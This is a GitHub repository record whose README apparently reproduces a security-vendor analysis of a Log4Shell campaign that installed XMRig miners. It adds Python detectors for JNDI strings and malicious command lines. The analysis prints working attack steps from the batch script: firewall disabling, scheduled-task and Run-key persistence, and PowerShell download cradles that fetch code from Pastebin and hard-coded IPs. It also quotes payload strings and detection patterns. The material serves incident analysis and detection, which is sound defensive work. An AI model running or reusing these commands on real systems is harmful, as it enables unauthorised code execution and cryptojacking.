{"id":19915546,"url":"https://github.com/demining/log4j-vulnerability","last_synced_at":"2025-09-06T16:45:19.395Z","repository":{"id":144620955,"uuid":"595794114","full_name":"demining/Log4j-Vulnerability","owner":"demining","description":"Vulnerability CVE-2021-44228 allows remote code execution without authentication for several versions of Apache Log4j2 (Log4Shell). Attackers can exploit vulnerable servers by connecting over any protocol, such as HTTPS, and sending a specially crafted string.","archived":false,"fork":false,"pushed_at":"2023-01-31T20:35:59.000Z","size":2993,"stargazers_count":6,"open_issues_count":0,"forks_count":2,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-01-11T23:21:18.988Z","etag":null,"topics":["attack","bitcoin","blockchain","cve-2021-44228","hack","hacking","log4j","log4js","log4shell","mining","vulnerability","vulnerability-scanner","vulnerable"],"latest_commit_sha":null,"homepage":"https://cryptodeeptech.ru/log4j-vulnerability","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/demining.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-01-31T20:29:26.000Z","updated_at":"2024-08-12T20:29:35.000Z","dependencies_parsed_at":null,"dependency_job_id":"13d7948f-de14-48fb-a89d-f7ea5eda6e5e","html_url":"https://github.com/demining/Log4j-Vulnerability","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/demining%2FLog4j-Vulnerability","tags_url":"htt
ps://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/demining%2FLog4j-Vulnerability/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/demining%2FLog4j-Vulnerability/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/demining%2FLog4j-Vulnerability/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/demining","download_url":"https://codeload.github.com/demining/Log4j-Vulnerability/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":241343509,"owners_count":19947398,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["attack","bitcoin","blockchain","cve-2021-44228","hack","hacking","log4j","log4js","log4shell","mining","vulnerability","vulnerability-scanner","vulnerable"],"created_at":"2024-11-12T21:40:52.626Z","updated_at":"2025-03-01T09:21:50.517Z","avatar_url":"https://github.com/demining.png","language":"JavaScript","readme":"\n# Log4j Vulnerability\n\n---\n\n\n---\n\n\n\n\n\n\u003cfigure class=\"aligncenter size-large\"\u003e\u003cimg decoding=\"async\" width=\"1024\" height=\"576\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/032-1024x576.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" class=\"wp-image-1873\" srcset=\"https://cryptodeeptech.ru/wp-content/uploads/2023/01/032-1024x576.png 1024w, https://cryptodeeptech.ru/wp-content/uploads/2023/01/032-300x169.png 300w, 
https://cryptodeeptech.ru/wp-content/uploads/2023/01/032-768x432.png 768w, https://cryptodeeptech.ru/wp-content/uploads/2023/01/032.png 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\"\u003e\u003c/figure\u003e\u003c/div\u003e\n\n\n---\n\n\n* Tutorial: https://youtu.be/PNDBjoT83zA\n* Tutorial: https://cryptodeeptech.ru/log4j-vulnerability\n\n\n---\n\n\u003chr class=\"wp-block-separator has-alpha-channel-opacity\"\u003e\n\n\n\n\u003ch3\u003eBackground on Log4j\u003c/h3\u003e\n\n\n\n\u003cp\u003eAlibaba Cloud Security Team publicly disclosed a critical vulnerability \u003ca href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2021-44228\" target=\"_blank\" rel=\"noreferrer noopener\"\u003e(CVE-2021-44228)\u003c/a\u003e enabling unauthenticated remote code execution against multiple versions of Apache Log4j2 (Log4Shell). Vulnerable servers can be exploited by an attacker connecting over any protocol, such as HTTPS, and sending a specially crafted string that Log4j2 evaluates as a JNDI lookup when it is logged.\u003c/p\u003e\n\n\n\n\u003ch3\u003eLog4j crypto-mining campaign\u003c/h3\u003e\n\n\n\n\u003cp\u003eDarktrace detected crypto-mining on multiple customer deployments that resulted from exploitation of this Log4j vulnerability. In each of these incidents, exploitation was followed by outbound SSL connections that appear to be requests for base64-encoded PowerShell scripts, used to bypass perimeter defenses and download batch (.bat) script files and multiple executables that install crypto-mining malware. The activity had wider campaign indicators, including common hard-coded IPs, executable files, and scripts.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe attack cycle begins with what appears to be opportunistic scanning of Internet-connected devices looking for VMware Horizon servers vulnerable to the Log4j exploit. Once a vulnerable server is found, the attacker makes HTTP and SSL connections to the victim. 
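\u003c/p\u003e

The crafted string such a request carries is a Log4j lookup of the form `${jndi:ldap://host:port/x}`, and scanners routinely hide the `jndi` token behind nested lookups (`${lower:j}`, `${::-j}`, `${env:NaN:-j}`) and URL encoding, so a literal `${jndi:` match misses most of them. The scanner below is an added example, not code from this page or from Darktrace: it collapses those lookups to a fixed point and reports the callback scheme, host and port. The access-log lines and the 203.0.113.x addresses are constructed for the example.

```python
"""Spot Log4Shell (CVE-2021-44228) lookup strings in HTTP access-log lines.

Added example; not code from this page or from Darktrace. The log lines and
the 203.0.113.x addresses below are constructed (RFC 5737 documentation range).
"""
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import unquote

# Lookups that evaluate to one character and are used to hide the "jndi" token:
#   ${lower:j} ${upper:n}   ${::-j} ${env:NaN:-j} ${sys:NaN:-j}   ${date:'j'}
# The case of ${upper:x} is left as-is; matching below is case-insensitive.
_CHAR_LOOKUPS = [
    re.compile(r"\$\{(?:lower|upper):([^{}])\}", re.I),
    re.compile(r"\$\{[^{}]*:-([^{}])\}"),  # default-value syntax with any prefix
    re.compile(r"\$\{date:'([^{}'])'\}", re.I),
]
# Once collapsed, the lookup reads ${jndi:<scheme>://<host>[:<port>]/...}
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?",
    re.I,
)


@dataclass(frozen=True)
class Finding:
    line: int
    scheme: str
    host: str
    port: Optional[int]


def normalize(text: str, max_rounds: int = 16) -> str:
    """Undo repeated URL encoding, then collapse one-character lookups to a fixed point."""
    decoded = unquote(text)
    while decoded != text:
        text, decoded = decoded, unquote(decoded)
    for _ in range(max_rounds):  # nested lookups need several passes
        before = text
        for rx in _CHAR_LOOKUPS:
            text = rx.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text


def scan(lines) -> list:
    """One Finding per line that carries a JNDI lookup after normalisation."""
    findings = []
    for no, raw in enumerate(lines, start=1):
        m = _JNDI.search(normalize(raw))
        if m:
            port = int(m["port"]) if m["port"] else None
            findings.append(Finding(no, m["scheme"].lower(), m["host"], port))
    return findings


# Constructed Apache-style lines: benign, plain payload in the User-Agent,
# obfuscated payload in the User-Agent, URL-encoded payload in the query string.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:00:02 +0000] "GET /portal/ HTTP/1.1" 200 88 "-" '
    '"${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:00:03 +0000] "GET /portal/ HTTP/1.1" 200 88 "-" '
    '"${${lower:j}${upper:n}${::-d}${env:NaN:-i}:${lower:l}dap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:00:04 +0000] '
    '"GET /?x=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.10%3A1099%2Fobj%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line}: JNDI callback {f.scheme}://{f.host}:{f.port}")
```

Run it over every logged request field (path, query, headers, User-Agent): the host:port it reports is the attacker's callback listener, the value to block and to hunt for in outbound connection logs. The campaign above used port 1389 for exactly this callback.

\u003cp\u003e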
Following successful exploitation, the server performs an outbound callback on port 1389 and retrieves a script named mad_micky.bat, which does the following:\u003c/p\u003e\n\n\n\n\u003cul\u003e\n\u003cli\u003eDisables the Windows firewall by setting all profiles to state=off:\u003cbr\u003e‘netsh advfirewall set allprofiles state off’\u003c/li\u003e\n\n\n\n\u003cli\u003eSearches for existing processes that indicate other miner installs, using ‘netstat -ano | findstr TCP’ to identify any process listening on ports :3333, :4444, :5555, :7777 or :9000, and stops those processes\u003c/li\u003e\n\n\n\n\u003cli\u003eCreates a new System.Net.WebClient to silently download wxm.exe\u003c/li\u003e\n\n\n\n\u003cli\u003eUses a scheduled task for persistence. The command ‘schtasks /create /F /sc minute /mo 1 /tn –‘ creates a task that runs every minute (/F suppresses the warning if a task of that name already exists), gives it the name ‘BrowserUpdate’, and points its action at the malicious domain ‘b.oracleservice[.]top’ and hard-coded IPs passed as XMRig pool arguments: -o 198.23.214[.]117:8080 -o 51.79.175[.]139:8080 -o 167.114.114[.]169:8080\u003c/li\u003e\n\n\n\n\u003cli\u003eAdds a value under the Run key for persistence: reg add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v Run2 /d\u003c/li\u003e\n\u003c/ul\u003e\n\n\n\n\u003cp\u003eIn at least two cases, the mad_micky.bat script was retrieved in an HTTP connection which had the user agent Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MAARJS). This was the first and only time this user agent was seen on these networks. It appears this user agent is used legitimately by some ASUS devices with fresh factory installs; however, as a new user agent seen only during this activity, it is suspicious.\u003c/p\u003e\n\n\n\n\u003cp\u003eFollowing successful exploitation, the server performs a callback on port 1389 to retrieve script files. 
In this example, /xms.ps1 is a base64-encoded PowerShell script that bypasses the execution policy on the host in order to fetch ‘mad_micky.bat’:\u003c/p\u003e\n\n\n\n\u003cfigure class=\"wp-block-image\"\u003e\u003cimg decoding=\"async\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/62d2a548a73d901f998b427c_1-1.jpeg\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\"\u003e\u003c/figure\u003e\n\n\n\n\u003cp\u003e\u003cem\u003eFigure 1: Additional insight on PowerShell script xms.ps1\u003c/em\u003e\u003c/p\u003e\n\n\n\n\u003cp\u003eThe snapshot details the event log for an affected server and indicates successful Log4j RCE that resulted in the mad_micky.bat file download:\u003c/p\u003e\n\n\n\n\u003cfigure class=\"wp-block-image\"\u003e\u003cimg decoding=\"async\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/62d2a5485d3ddb97cd7d959a_1-2.jpeg\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\"\u003e\u003c/figure\u003e\n\n\n\n\u003cp\u003e\u003cem\u003eFigure 2: Log data highlighting mad_micky.bat file\u003c/em\u003e\u003c/p\u003e\n\n\n\n\u003cp\u003eAdditional connections were initiated to retrieve executable files and scripts. The scripts contained two IP addresses, located in Korea and Ukraine. A connection was made to the Ukrainian IP to download the executable file xm.exe, which activates the miner. The miner, in this case XMRig, is an open-source, cross-platform mining tool available for download from multiple public locations. 
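\u003c/p\u003e

Every behaviour listed for mad_micky.bat above shows up as a process command line (Sysmon event 1, or Security event 4688 with command-line auditing enabled), so the quickest host-side check is a rule per behaviour over those records. The triage script below is an added example, not code from this page or from Darktrace: it runs one rule per listed behaviour over a batch of command lines and pulls out the XMRig -o pool endpoints. The command lines are constructed from the description above; the 203.0.113.x addresses and pool.example stand in for the campaign's hard-coded IPs and domain.

```python
"""Flag the mad_micky.bat behaviours in Windows process command lines.

Added example; not code from this page or from Darktrace. The command lines
below are constructed from the behaviours described above; the 203.0.113.x
addresses and pool.example are placeholders, not the campaign's IoCs.
"""
import re
from dataclasses import dataclass

# One rule per behaviour the write-up attributes to mad_micky.bat.
RULES = {
    "firewall_disabled": r"netsh(?:\.exe)?\s+advfirewall\s+set\s+allprofiles\s+state\s+off",
    "miner_port_sweep": r"netstat\s+-ano\b.*\bfindstr\b.*:(?:3333|4444|5555|7777|9000)\b",
    "webclient_download": r"System\.Net\.WebClient\b.*\.DownloadFile\(|net\.webclient\)\.downloadstring\(",
    "one_minute_task": r"schtasks\s+/create\b(?=.*\s/sc\s+minute\b)(?=.*\s/mo\s+1\b)",
    "run_key_persistence": r"reg\s+add\s+HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\b",
    "exec_policy_bypass": r"powershell(?:\.exe)?\b.*\s-ep\s+bypass\b",
}
_COMPILED = {name: re.compile(rx, re.I) for name, rx in RULES.items()}
# XMRig pool arguments (-o host:port); the schtasks /tr payload carries them too.
_POOL = re.compile(r"(?:^|\s)-o\s+([A-Za-z0-9.\-]+):(\d{2,5})\b")


@dataclass(frozen=True)
class Hit:
    rule: str
    line: int
    evidence: str  # the text the rule matched, for the analyst


def triage(cmdlines) -> list:
    """Every (rule, line) pair that fires, in input order."""
    hits = []
    for no, cmd in enumerate(cmdlines, start=1):
        for name, rx in _COMPILED.items():
            m = rx.search(cmd)
            if m:
                hits.append(Hit(name, no, m.group(0)))
    return hits


def pool_endpoints(cmdlines) -> list:
    """Distinct host:port pairs passed with -o: the mining-pool endpoints to block."""
    return sorted({(host, int(port)) for cmd in cmdlines for host, port in _POOL.findall(cmd)})


# Constructed process command lines in the order mad_micky.bat performs them,
# plus one benign svchost line as a control.
SAMPLE_CMDLINES = [
    r"C:\Windows\System32\netsh.exe advfirewall set allprofiles state off",
    r'cmd.exe /c netstat -ano | findstr TCP | findstr ":3333 :4444 :5555 :7777 :9000"',
    r"powershell -Command $wc = New-Object System.Net.WebClient; "
    r"$wc.DownloadFile('http://203.0.113.10/wxm.exe', 'C:\Users\svc\wxm.exe')",
    r'schtasks /create /F /sc minute /mo 1 /tn BrowserUpdate /tr '
    r'"C:\Users\svc\mimu6\xmrig.exe -o 203.0.113.11:8080 -o 203.0.113.12:8080 -o pool.example:3333"',
    r'reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Run2 /d "C:\Users\svc\wxm.exe"',
    r"C:\Windows\System32\svchost.exe -k netsvcs -p",
    r'''powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop '''
    r'''-c "IEX ((new-object net.webclient).downloadstring('https://paste.example/raw/abc'))"''',
]

if __name__ == "__main__":
    for h in triage(SAMPLE_CMDLINES):
        print(f"line {h.line}: {h.rule}: {h.evidence}")
    print("pools:", pool_endpoints(SAMPLE_CMDLINES))
```

Any single rule (a firewall change, a one-minute task) has benign matches on an admin workstation; on a VMware Horizon server, several of them firing within minutes of an inbound Log4j callback is the campaign pattern. Feed the pool endpoints to egress blocking and to the XMRig config.json review below.

\u003cp\u003e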
The next observed exe download was for ‘wxm.exe’ (MD5 f0cf1d3d9ed23166ff6c1f3deece19b4).\u003c/p\u003e\n\n\n\n\u003cfigure class=\"wp-block-image\"\u003e\u003cimg decoding=\"async\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/62d2a548633c395a4ad861e7_1-3.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\"\u003e\u003c/figure\u003e\n\n\n\n\u003cp\u003e\u003cem\u003eFigure 3: Additional insight regarding XMRig executable\u003c/em\u003e\u003c/p\u003e\n\n\n\n\u003cp\u003eThe connection to the Korean IP involved a request for another script (/2.ps1) as well as an executable file (LogBack.exe). This script deletes scheduled tasks and WMI event filters and consumers whose names refer to logging, such as the SCM Event Log Filter and the PowerShell Event Log Consumer. The script also requests a file from Pastebin, which is possibly a Cobalt Strike beacon configuration file. The scheduled tasks and WMI objects deleted included: Eventlogger, SCM Event Log Filter, DSM Event Log Consumer, PowerShell Event Log Consumer, Windows Events Consumer, BVTConsumer.\u003c/p\u003e\n\n\n\n\u003cul\u003e\n\u003cli\u003eConfig file (no longer hosted): IEX (New-Object System.Net.Webclient).DownloadString('hxxps://pastebin.com/raw/g93wWHkR')\u003c/li\u003e\n\u003c/ul\u003e\n\n\n\n\u003cp\u003eThe second file requested from Pastebin, also no longer hosted, is fetched by a schtasks command and so was probably used to establish persistence. The task name mimics the legitimate .NET Framework NGEN task, so hunt on the action (a hidden PowerShell download cradle running as SYSTEM every five minutes) rather than on the name:\u003c/p\u003e\n\n\n\n\u003cul\u003e\n\u003cli\u003eschtasks /create /sc MINUTE /mo 5 /tn \"\\Microsoft\\windows\\.NET Framework\\.NET Framework NGEN v4.0.30319 32\" /tr \"c:\\windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''hxxps://pastebin.com/raw/bcFqDdXx''))'\" /F /ru System\u003c/li\u003e\n\u003c/ul\u003e\n\n\n\n\u003cp\u003eThe 
executable file Logback.exe is another XMRig mining tool. A config.json file was also downloaded from the same Korean IP. After this, cmd.exe and wmic commands were used to configure the miner.\u003c/p\u003e\n\n\n\n\u003cp\u003eThese file downloads and miner configuration were followed by additional connections to Pastebin.\u003c/p\u003e\n\n\n\n\u003cfigure class=\"wp-block-image\"\u003e\u003cimg decoding=\"async\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/62d2a54849ba531521cac33f_1-4.jpeg\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\"\u003e\u003c/figure\u003e\n\n\n\n\u003cp\u003e\u003cem\u003eFigure 4: OSINT correlation of mad_micky.bat file\u003c/em\u003e\u003c/p\u003e\n\n\n\n\u003chr class=\"wp-block-separator has-alpha-channel-opacity\"\u003e\n\n\n\n\u003ch3\u003eProcess specifics — mad_micky.bat file\u003c/h3\u003e\n\n\n\n\u003ch4\u003eInstall\u003c/h4\u003e\n\n\n\n\u003cpre class=\"wp-block-code\"\u003e\u003ccode\u003eset \"STARTUP_DIR=%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"\nset \"STARTUP_DIR=%USERPROFILE%\\Start Menu\\Programs\\Startup\"\n\nREM looking for the following utilities: powershell, find, findstr, tasklist, sc\nset \"LOGFILE=%USERPROFILE%\\mimu6\\xmrig.log\"\nREM choose a pool port from the expected hashrate (MoneroOcean port scheme)\nif %EXP_MONER_HASHRATE% gtr 8192 ( set PORT=18192 \u0026amp; goto PORT_OK)\nif %EXP_MONER_HASHRATE% gtr 4096 ( set PORT=14906 \u0026amp; goto PORT_OK)\nif %EXP_MONER_HASHRATE% gtr 2048 ( set PORT=12048 \u0026amp; goto PORT_OK)\nif %EXP_MONER_HASHRATE% gtr 1024 ( set PORT=11024 \u0026amp; goto PORT_OK)\nif %EXP_MONER_HASHRATE% gtr 512 ( set PORT=10512 \u0026amp; goto PORT_OK)\nif %EXP_MONER_HASHRATE% gtr 256 ( set PORT=10256 \u0026amp; goto PORT_OK)\nif %EXP_MONER_HASHRATE% gtr 128 ( set PORT=10128 \u0026amp; goto PORT_OK)\nif %EXP_MONER_HASHRATE% gtr 64 ( set PORT=10064 \u0026amp; goto PORT_OK)\nif %EXP_MONER_HASHRATE% gtr 32 ( set 
PORT=10032 \u0026amp; goto PORT_OK)\nif %EXP_MONER_HASHRATE% gtr 16 ( set PORT=10016 \u0026amp; goto PORT_OK)\nif %EXP_MONER_HASHRATE% gtr 8 ( set PORT=10008 \u0026amp; goto PORT_OK)\nif %EXP_MONER_HASHRATE% gtr 4 ( set PORT=10004 \u0026amp; goto PORT_OK)\nif %EXP_MONER_HASHRATE% gtr 2 ( set PORT=10002 \u0026amp; goto PORT_OK)\nset PORT=10001\n:PORT_OK\u003c/code\u003e\u003c/pre\u003e\n\n\n\n\u003chr class=\"wp-block-separator has-alpha-channel-opacity\"\u003e\n\n\n\n\u003ch4\u003ePreparing miner\u003c/h4\u003e\n\n\n\n\u003cpre class=\"wp-block-code\"\u003e\u003ccode\u003eecho [*] Removing previous mimu miner (if any)\nsc stop gado_miner\nsc delete gado_miner\ntaskkill /f /t /im xmrig.exe\ntaskkill /f /t /im logback.exe\ntaskkill /f /t /im network02.exe\n:REMOVE_DIR0\necho [*] Removing \"%USERPROFILE%\\mimu6\" directory\ntimeout 5\nrmdir /q /s \"%USERPROFILE%\\mimu6\" \u0026gt;NUL 2\u0026gt;NUL\nIF EXIST \"%USERPROFILE%\\mimu6\" GOTO REMOVE_DIR0\u003c/code\u003e\u003c/pre\u003e\n\n\n\n\u003chr class=\"wp-block-separator has-alpha-channel-opacity\"\u003e\n\n\n\n\u003ch4\u003eDownload of XMRIG\u003c/h4\u003e\n\n\n\n\u003cpre class=\"wp-block-code\"\u003e\u003ccode\u003eecho [*] Downloading MoneroOcean advanced version of XMRig to \"%USERPROFILE%\\xmrig.zip\"\npowershell -Command \"$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://141.85.161[.]18/xmrig.zip', '%USERPROFILE%\\xmrig.zip')\"\necho copying to mimu directory\nif errorlevel 1 (\necho ERROR: Can't download MoneroOcean advanced version of xmrig\ngoto MINER_BAD)\u003c/code\u003e\u003c/pre\u003e\n\n\n\n\u003chr class=\"wp-block-separator has-alpha-channel-opacity\"\u003e\n\n\n\n\u003ch4\u003eUnpack and install\u003c/h4\u003e\n\n\n\n\u003cpre class=\"wp-block-code\"\u003e\u003ccode\u003eecho [*] Unpacking \"%USERPROFILE%\\xmrig.zip\" to \"%USERPROFILE%\\mimu6\"\npowershell -Command \"Add-type -AssemblyName System.IO.Compression.FileSystem; 
[System.IO.Compression.ZipFile]::ExtractToDirectory('%USERPROFILE%\\xmrig.zip', '%USERPROFILE%\\mimu6')\"\nif errorlevel 1 (\necho [*] Downloading 7za.exe to \"%USERPROFILE%\\7za.exe\"\npowershell -Command \"$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://141.85.161[.]18/7za.txt', '%USERPROFILE%\\7za.exe')\"\n)\n\nREM rewrite the bundled config.json: pool, credentials, full CPU, and a log file\npowershell -Command \"$out = cat '%USERPROFILE%\\mimu6\\config.json' | %%{$_ -replace '\\\"url\\\": *\\\".*\\\",', '\\\"url\\\": \\\"207.38.87[.]6:3333\\\",'} | Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\\mimu6\\config.json'\"\npowershell -Command \"$out = cat '%USERPROFILE%\\mimu6\\config.json' | %%{$_ -replace '\\\"user\\\": *\\\".*\\\",', '\\\"user\\\": \\\"%PASS%\\\",'} | Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\\mimu6\\config.json'\"\npowershell -Command \"$out = cat '%USERPROFILE%\\mimu6\\config.json' | %%{$_ -replace '\\\"pass\\\": *\\\".*\\\",', '\\\"pass\\\": \\\"%PASS%\\\",'} | Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\\mimu6\\config.json'\"\npowershell -Command \"$out = cat '%USERPROFILE%\\mimu6\\config.json' | %%{$_ -replace '\\\"max-cpu-usage\\\": *\\d*,', '\\\"max-cpu-usage\\\": 100,'} | Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\\mimu6\\config.json'\"\nset LOGFILE2=%LOGFILE:\\=\\\\%\npowershell -Command \"$out = cat '%USERPROFILE%\\mimu6\\config.json' | %%{$_ -replace '\\\"log-file\\\": *null,', '\\\"log-file\\\": \\\"%LOGFILE2%\\\",'} | Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\\mimu6\\config.json'\"\nif %ADMIN% == 1 goto ADMIN_MINER_SETUP\n\nREM non-admin path: persist via the user's Startup folder\nif exist \"%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\" (\nset \"STARTUP_DIR=%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"\ngoto STARTUP_DIR_OK\n)\nif exist \"%USERPROFILE%\\Start Menu\\Programs\\Startup\" (\nset \"STARTUP_DIR=%USERPROFILE%\\Start Menu\\Programs\\Startup\"\ngoto STARTUP_DIR_OK\n)\necho [*] Downloading tools to make gado_miner service to \"%USERPROFILE%\\nssm.zip\"\npowershell 
-Command \"$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://141.85.161[.]18/nssm.zip', '%USERPROFILE%\\nssm.zip')\"\nif errorlevel 1 (\necho ERROR: Can't download tools to make gado_miner service\nexit /b 1\n)\u003c/code\u003e\u003c/pre\u003e\n\n\n\n\u003ch3\u003eDetecting the campaign using Darktrace\u003c/h3\u003e\n\n\n\n\u003cp\u003eThe key model breaches Darktrace used to identify this campaign include compromise-focussed models for\u0026nbsp;\u003cem\u003eApplication Protocol on Uncommon Port\u003c/em\u003e,\u0026nbsp;\u003cem\u003eOutgoing Connection to Rare From Server\u003c/em\u003e, and\u0026nbsp;\u003cem\u003eBeaconing to Rare Destination\u003c/em\u003e, and file-focussed models for\u0026nbsp;\u003cem\u003eMasqueraded File Transfer\u003c/em\u003e,\u0026nbsp;\u003cem\u003eMultiple Executable Files and Scripts from Rare Locations\u003c/em\u003e, and\u0026nbsp;\u003cem\u003eCompressed Content from Rare External Location\u003c/em\u003e. Cryptocurrency mining is detected under the\u0026nbsp;\u003cem\u003eCryptocurrency Mining Activity\u003c/em\u003e\u0026nbsp;models.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe models associated with\u0026nbsp;\u003cem\u003eUnusual PowerShell to Rare and New User Agent\u003c/em\u003e\u0026nbsp;highlight the anomalous connections on the infected devices following the Log4j callbacks.\u003c/p\u003e\n\n\n\n\u003cp\u003eCustomers with Darktrace’s\u0026nbsp;\u003ca href=\"https://www.darktrace.com/en/autonomous-response\"\u003eAutonomous Response\u003c/a\u003e\u0026nbsp;technology, Antigena, also had actions to block the incoming files and scripts and to restrict the infected devices to their normal pattern of life, preventing both the initial malicious file downloads and the ongoing crypto-mining activity.\u003c/p\u003e\n\n\n\n\u003ch3\u003eAppendix\u003c/h3\u003e\n\n\n\n\u003ch4\u003eDarktrace model detections\u003c/h4\u003e\n\n\n\n\u003cul\u003e\n\u003cli\u003eAnomalous Connection / Application Protocol on Uncommon 
Port\u003c/li\u003e\n\n\n\n\u003cli\u003eAnomalous Connection / New User Agent to IP Without Hostname\u003c/li\u003e\n\n\n\n\u003cli\u003eAnomalous Connection / PowerShell to Rare External\u003c/li\u003e\n\n\n\n\u003cli\u003eAnomalous File / EXE from Rare External location\u003c/li\u003e\n\n\n\n\u003cli\u003eAnomalous File / Masqueraded File Transfer\u003c/li\u003e\n\n\n\n\u003cli\u003eAnomalous File / Multiple EXE from Rare External Locations\u003c/li\u003e\n\n\n\n\u003cli\u003eAnomalous File / Script from Rare External Location\u003c/li\u003e\n\n\n\n\u003cli\u003eAnomalous File / Zip or Gzip from Rare External Location\u003c/li\u003e\n\n\n\n\u003cli\u003eAnomalous Server Activity / Outgoing from Server\u003c/li\u003e\n\n\n\n\u003cli\u003eCompliance / Crypto Currency Mining Activity\u003c/li\u003e\n\n\n\n\u003cli\u003eCompromise / Agent Beacon (Long Period)\u003c/li\u003e\n\n\n\n\u003cli\u003eCompromise / Agent Beacon (Medium Period)\u003c/li\u003e\n\n\n\n\u003cli\u003eCompromise / Agent Beacon (Short Period)\u003c/li\u003e\n\n\n\n\u003cli\u003eCompromise / Beacon to Young Endpoint\u003c/li\u003e\n\n\n\n\u003cli\u003eCompromise / Beaconing Activity To External Rare\u003c/li\u003e\n\n\n\n\u003cli\u003eCompromise / Crypto Currency Mining Activity\u003c/li\u003e\n\n\n\n\u003cli\u003eCompromise / Sustained TCP Beaconing Activity To Rare Endpoint\u003c/li\u003e\n\n\n\n\u003cli\u003eDevice / New PowerShell User Agent\u003c/li\u003e\n\n\n\n\u003cli\u003eDevice / Suspicious Domain\u003c/li\u003e\n\u003c/ul\u003e\n\n\n\n\u003ch4\u003eMITRE ATT\u0026amp;CK techniques observed\u003c/h4\u003e\n\n\n\n\u003cfigure class=\"wp-block-image\"\u003e\u003cimg decoding=\"async\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/62ea70a286d2172d033147de_mitre CobaltStrike .jpg\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j 
